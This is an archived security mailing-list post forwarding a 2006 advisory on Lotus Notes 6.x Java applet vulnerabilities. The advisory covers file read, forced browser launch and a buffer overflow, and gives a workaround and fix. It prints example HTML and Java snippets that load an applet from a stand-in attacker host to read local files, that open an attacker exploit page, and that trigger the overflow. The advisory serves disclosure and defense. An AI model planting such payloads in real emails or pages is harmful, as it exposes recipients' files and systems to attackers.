ðòïåëôù 


  áòèé÷ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 


  ðåòóïîáìøîïå 


  ðòïçòáííù 



ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [NT] Lotus Notes Multiple Java Applet Vulnerabilities



> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
> Sent: Sunday, October 08, 2006 3:15 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Lotus Notes Multiple Java Applet Vulnerabilities
> 
> The following security advisory is sent to the securiteam 
> mailing list, and can be found at the SecuriTeam web site: 
> http://www.securiteam.com 
> 
> - - promotion
> 
> The SecuriTeam alerts list - Free, Accurate, Independent.
> 
> Get your security news from a reliable source.
> http://www.securiteam.com/mailinglist.html 
> 
> 
> - - - - - - - - -
> 
> 
> 
> Lotus Notes Multiple Java Applet Vulnerabilities 
> 
> 
> 
> Lotus Notes is a groupware/e-mail system developed by Lotus 
> Software. Due to its security and collaboration features it's 
> used particularly by large organizations, government 
> agencies, etc. IBM estimates it is used by 60 million people. 
> 
> The vulnerabilities involve Java applets embedded in HTML 
> formatted e-mail messages. A contributing factor in all of 
> the issues is that such Java applets are automatically 
> displayed when the e-mail message is viewed (unlike with most 
> e-mail clients). 
> 
> 
> Vulnerable Systems: 
>  * Lotus Notes versions 6.0x. 
>  * Lotus Notes versions 6.5x. 
> 
> Global file read access: 
> An e-mail message containing a Java Applet with the codebase 
> "file:///" gains unlimited read access to local files when 
> the e-mail is viewed. An example HTML snippet follows: 
>   <applet codebase="file:///" 
> archive="http://www.attacker.tld/applet.jar"; 
>    width="1" height="1"></applet> 
> 
> 
> The applet's Java bytecode itself needn't be contained in the 
> e-mail but it's only referenced by the archive URL. The 
> applet gets automatically loaded when the e-mail is viewed. 
> It has file read access on the local system (can read 
> whatever files the currently logged in user can, and list 
> hard drive contents). The applet can use e.g. JavaScript to 
> relay the files to the attacker. 
> 
> Launching web browser: 
> A Java applet embedded in the same way can forcibly launch a 
> web browser with the desired URL when an e-mail message is viewed. 
> 
> An example piece of Java code to do this follows: 
>   public void init() { 
>     
> getAppletContext().showDocument("http://www.attacker.tld/ie-ex
> ploits.html"); 
>   } 
> 
> 
> Under default settings, Internet Explorer is launched and the 
> attacker supplied URL is opened in it when the e-mail message 
> is viewed. This exposes the system to Internet Explorer 
> vulnerabilities, greatly widening the attack surface. 
> 
> Codebase buffer overflow: 
> Opening an HTML e-mail message which contains an applet tag 
> with a long codebase parameter (over 500 bytes) causes an 
> apparently stack-based buffer overflow condition. It may be 
> exploitable to run arbitrary code on the victim system when 
> the e-mail message is viewed. 
> 
> This is an example piece of HTML to produce it: 
>  <applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA" 
>   code="java.applet.Applet" width=100 height=100></applet> 
> 
> Exploitability of this scenario was NOT confirmed. 
> 
> Workaround: 
> Disabling Java applets can be used to protect from these 
> vulnerabilities. 
> To disable Java applets, select File -> Preferences -> User 
> Preferences from the Notes client menu and uncheck the option 
> for "Enable Java applets." 
> 
> Fix: 
> The issues have been addressed in Lotus Notes versions 6.5.4 
> and 6.0.5. 
> For detailed fix information, see: 
> http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&;
> loc=en_US&cs=utf-8&cc=us?=en 
> 
> 
> Additional Information: 
> The information has been provided by Jouko Pynnonen 
> <mailto:jouko@xxxxxx> . 
> The original article can be found at: http://iki.fi/jouko 
> 
> 
> ==============================================================
> ================== 
> 
> 
> 
> 
> 
> This bulletin is sent to members of the SecuriTeam mailing list. 
> To unsubscribe from the list, send mail with an empty subject 
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx 
> In order to subscribe to the mailing list and receive 
> advisories in HTML format, simply forward this email to: 
> html-list-subscribe@xxxxxxxxxxxxxx 
> 
> 
> 
> ==============================================================
> ================== 
> ==============================================================
> ================== 
> 
> DISCLAIMER: 
> The information in this bulletin is provided "AS IS" without 
> warranty of any kind. 
> In no event shall we be liable for any damages whatsoever 
> including direct, indirect, incidental, consequential, loss 
> of business profits or special damages. 
> 
> 
> 
> 
> 
> 



 




Copyright © Lexa Software, 1996-2009.